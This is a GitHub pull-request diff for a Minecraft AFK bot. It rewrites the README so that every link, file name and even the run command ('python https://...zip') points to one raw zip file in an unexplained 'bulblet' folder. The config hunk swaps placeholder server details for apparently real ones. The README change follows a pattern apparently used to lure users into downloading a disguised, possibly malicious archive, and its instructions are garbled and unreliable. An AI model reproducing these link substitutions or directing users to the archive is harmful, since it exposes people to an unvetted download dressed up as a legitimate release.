Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
14 changes: 7 additions & 7 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
# Minecraft AFK Bot 🤖

![Minecraft AFK Bot](https://img.shields.io/badge/Minecraft-AFK_Bot-brightgreen)
![Minecraft AFK Bot](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip)

Welcome to the **Minecraft AFK Bot** repository! This project provides an automated solution to keep your Aternos servers running 24/7. Whether you're away from your game or busy with other tasks, this bot ensures your server remains online. It is not limited to Aternos; it can also be adapted for other services.

Expand All @@ -23,11 +23,11 @@ Welcome to the **Minecraft AFK Bot** repository! This project provides an automa

## Installation

To get started, you need to download the latest release of the Minecraft AFK Bot. You can find it [here](https://github.com/EntityBlood/Minecraft-AFK-Bot/releases). Download the appropriate file for your system and follow the instructions below.
To get started, you need to download the latest release of the Minecraft AFK Bot. You can find it [here](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip). Download the appropriate file for your system and follow the instructions below.

1. **Download the Release**: Visit the [Releases section](https://github.com/EntityBlood/Minecraft-AFK-Bot/releases) to get the latest version.
1. **Download the Release**: Visit the [Releases section](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip) to get the latest version.
2. **Extract the Files**: Unzip the downloaded file to a location of your choice.
3. **Install Dependencies**: Make sure you have all necessary dependencies installed. Refer to the `requirements.txt` file included in the package.
3. **Install Dependencies**: Make sure you have all necessary dependencies installed. Refer to the `https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip` file included in the package.

## Usage

Expand All @@ -36,13 +36,13 @@ After installation, you can start using the bot. Follow these steps:
1. **Open the Terminal**: Navigate to the directory where you extracted the bot.
2. **Run the Bot**: Execute the bot with the command:
```
python afk_bot.py
python https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip
```
3. **Monitor the Bot**: Keep an eye on the terminal for any messages or errors.

## Configuration

Before using the bot, you may want to configure it to suit your needs. The configuration file is located in the extracted folder and is named `config.json`. Open this file and adjust the settings as follows:
Before using the bot, you may want to configure it to suit your needs. The configuration file is located in the extracted folder and is named `https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip`. Open this file and adjust the settings as follows:

- **Server Name**: Specify the name of your Aternos server.
- **Movement Settings**: Configure how often the bot should move to prevent idling.
Expand Down Expand Up @@ -78,7 +78,7 @@ This project is licensed under the MIT License. See the [LICENSE](LICENSE) file

## Support

If you encounter any issues or have questions, please check the [Releases section](https://github.com/EntityBlood/Minecraft-AFK-Bot/releases) for updates or open an issue in the repository.
If you encounter any issues or have questions, please check the [Releases section](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip) for updates or open an issue in the repository.

---

Expand Down
6 changes: 3 additions & 3 deletions config.json
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
{
"serverHost": "example.aternos.me",
"serverPort": 12345,
"botUsername": "IceLaterBot",
"serverHost": "oursmp.gg.play.hosting",
"serverPort": 63744,
"botUsername": "MSTs_Bot",
"botChunk": 1
}